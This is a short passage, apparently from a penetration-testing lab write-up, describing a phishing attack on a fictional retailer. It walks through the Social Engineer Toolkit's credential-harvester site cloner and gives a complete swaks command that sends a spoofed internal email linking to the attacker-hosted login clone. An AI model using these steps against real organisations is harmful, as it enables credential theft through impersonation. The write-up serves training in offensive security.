Phishing attack

We can use the Social Engineer Toolkit to set up a fake website and phish the users. SEToolkit supports cloning pages and capturing incoming credentials. Run setoolkit and select the options Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack > Site Cloner . Next, enter your VPN IP address (e.g. 10.10.14.X) for incoming requests, followed by the login page URL:

https://humongousretail.com/remote/auth/login.aspx

And if the SMTP port is enabled, we can use the swaks utility to send emails from the command line.

└─$ swaks --to sales@humongousretail.com --from it@humongousretail.com --header "Subject: Credentials / Errors" --body "citrix http://10.10.14.12/remote/auth/login.aspx" --server humongousretail.com